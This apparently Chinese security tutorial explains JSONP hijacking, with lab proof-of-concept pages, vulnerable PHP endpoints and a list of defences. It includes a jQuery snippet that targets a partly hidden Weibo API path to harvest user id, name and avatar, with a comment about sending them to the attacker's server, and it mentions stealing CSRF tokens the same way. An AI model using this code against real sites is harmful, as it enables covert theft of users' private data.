jsonp劫持攻击

jsonp 全称是JSON with Padding，是一个非官方的协议json的一种使用模式，可以让网页从别的网站那获取资料，利用 <script> 标签的跨域能力实现跨域数据的访问，请求动态生成的js脚本同时带一个callback函数名作为参数。

服务端收到请求后，动态生成脚本产生数据，并在代码中以产生的数据为参数调用callback函数，网页可以得到从其他来源动态产生的json数据，因此可以用来实现跨域。

 

 

 

如果网站B对网站A的JSONP请求没有进行安全检查直接返回数据，则网站B 便存在JSONP 漏洞，网站A 利用JSONP漏洞能够获取用户在网站B上的数据。

JSONP漏洞利用过程如下：

1、用户在网站B注册并登录，网站B 包含了用户的id，name，email等信息。

2、用户通过浏览器向网站A发出URL请求。

3、网站A向用户返回响应页面，响应页面中注册了js的回调函数和向网站B请求的script标签，示例代码如下：

1 2 3 4 5 6 7

<script type="text/javascript"> function Callback(result) {     alert(result.name); } </script> <script type="text/javascript" src="http://B.com/user?jsonp=Callback"></script>

4、用户收到响应，解析JS代码，将回调函数作为参数向网站B发出请求；

5、网站B接收到请求后，解析请求的URL，以 JSON 格式生成请求需要的数据，将封装的包含用户信息的JSON数据作为回调函数的参数返回给浏览器，网站B返回的数据实例如下：

1	Callback({"id":1,"name":"test","email":"test@test.com"})。

 6、网站B数据返回后，浏览器则自动执行Callback函数对步骤4返回的JSON格式数据进行处理，通过alert弹窗展示了用户在网站B的注册信息。另外也可将JSON数据回传到网站A的服务器，这样网站A利用网站B的JSONP漏洞便获取到了用户在网站B注册的信息。

 

JSONP利用过程

 

 

JSONP 漏洞利用技巧

主要被攻击者用来在受害者不知不觉中窃取他们的隐私数据，常常被一些 APT 组织采用进行信息收集和钓鱼的工作( 水坑攻击 )，下面的一个例子就可以说是在模拟水坑攻击。

当我们发现信息泄露的 jsonp 接口以后我们要做的就是在自己的网站上写一个脚本，然后引诱受害者去访问这个网站，一旦访问了这个网站，脚本就会自动运行，就会想这个接口请求用户的敏感数据，并传送到攻击者的服务器上

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

$.ajax({     url: 'https://api.weibo.com/2/{隐藏了哦}',     type: 'get',     dataType: 'jsonp', }).done(function(json){     var id = json["data"]["id"];     var screen_name = json["data"]["screen_name"];     var profile_image_url = json["data"]["profile_image_url"];       var post_data = "";     post_data += "id=" + id + "&";     post_data += "screen_name=" + screen_name + "&";     post_data += "profile_image_url=" + encodeURIComponent(profile_image_url);     console.log(post_data);     // 发送到我的服务器上 }).fail(function() {});

 这样就能收到大量用户的敏感信息了

 

相关扩展

敏感信息除了一些 email 手机号 用户名等，还可以是 CSRF Token 信息。

有时候在 CSRF token 获取不到但是又找不到 XSS 的攻击点的时候，应该考虑一下jsonp劫持，这种攻击方式有点类似于CSRF。

 

防护方案

1、严格安全的实现 CSRF 方式调用 JSON 文件，限制 Referer 、部署一次性 Token 等。

2、严格安装 JSON 格式标准输出 Content-Type 及编码（ Content-Type : application/json; charset=utf-8 ）。

3、严格过滤 callback 函数名及 JSON 里数据的输出。

4、严格限制对 JSONP 输出 callback 函数名的长度(如防御上面 flash 输出的方法)。

5、如在 Callback 输出之前加入其他字符(如：/**/、回车换行)这样不影响 JSON 文件加载，又能一定程度预防其他文件格式的输出。还比如 Gmail 早起使用 AJAX 的方式获取 JSON ，听过在输出 JSON 之前加入 while(1) ，这样的代码来防止 JS 远程调用。

 

如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ):

{"id" : "1","name" : "hello jsonp"}

对于实际应用过程中 callback 的名称在后台实现是动态输出的。如上面例子在 PHP 实现：

<?php
//getUsers.php
$callback = $_GET['callback'];
print $callback.'({"id" : "1","name" : "hello jsonp"});';
?>

 

然后在 a.com 使用 <script> 进行远程调用,在 Jquery 里可以直接这样调用：

<script type="text/javascript" src="http://mini.jiasule.com/framework/jquery/1.9.1/jquery-1.9.1.js"></script>
<script type="text/javascript">
    $.getJSON("http://www.b.com/getUsers.php?callback=?", function(getUsers){
          alert(getUsers.name);
    });
</script>

JSONP劫持漏洞实例

getUser.php

<?php
header('Content-type: application/json');
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//得到回调函数名
//json数据
//$json_data = '["id","user"]';
$json_data='({"id":"1","name":"hello jsonp"})';
echo $jsoncallback . "(" . $json_data . ")";//输出jsonp数据
?>

 

客户端实现 callbackFunction 函数实现劫持

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP劫持</title>
</head>
<body>
<script type="text/javascript">
function callbackFunction(result)
        {
            alert(result.name);
        }
</script>
<script type="text/javascript" src="http://10.10.10.10/jsonp/getUser.php?jsoncallback=callbackFunction"></script>
</body>
</html>

出现弹窗

 

jQuery 使用 JSONP

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>JSONP劫持</title>
    <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>    
</head>
<body>
<div id="testag"></div>

<script type="text/javascript">    
    $.getJSON("http://10.10.10.10/jsonp/getUser.php?jsoncallback=?", function(getUsers){
          alert(getUsers.name);
    });
</script>
</body>
</html>

出现弹窗